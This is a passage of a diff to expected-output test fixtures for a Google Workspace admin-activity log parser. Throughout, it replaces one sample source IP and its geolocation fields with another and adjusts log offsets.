+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2377,26 +2201,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 19064,
+        "log.offset": 19020,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2418,7 +2238,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2431,26 +2251,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 19493,
+        "log.offset": 19448,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2472,7 +2288,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2485,26 +2301,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 19908,
+        "log.offset": 19862,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2525,7 +2337,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2539,26 +2351,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 20315,
+        "log.offset": 20268,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2579,7 +2387,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -2590,26 +2398,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 20778,
+        "log.offset": 20730,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2630,7 +2434,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2644,26 +2448,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 21103,
+        "log.offset": 21054,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2684,7 +2484,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2698,26 +2498,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 21564,
+        "log.offset": 21514,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2738,7 +2534,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2752,26 +2548,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 22021,
+        "log.offset": 21970,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2792,7 +2584,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2805,26 +2597,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 22480,
+        "log.offset": 22428,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2845,7 +2633,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2857,26 +2645,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 22925,
+        "log.offset": 22872,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2897,7 +2681,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -2910,27 +2694,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 23322,
+        "log.offset": 23268,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2955,7 +2735,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -2968,26 +2748,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 23761,
+        "log.offset": 23706,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
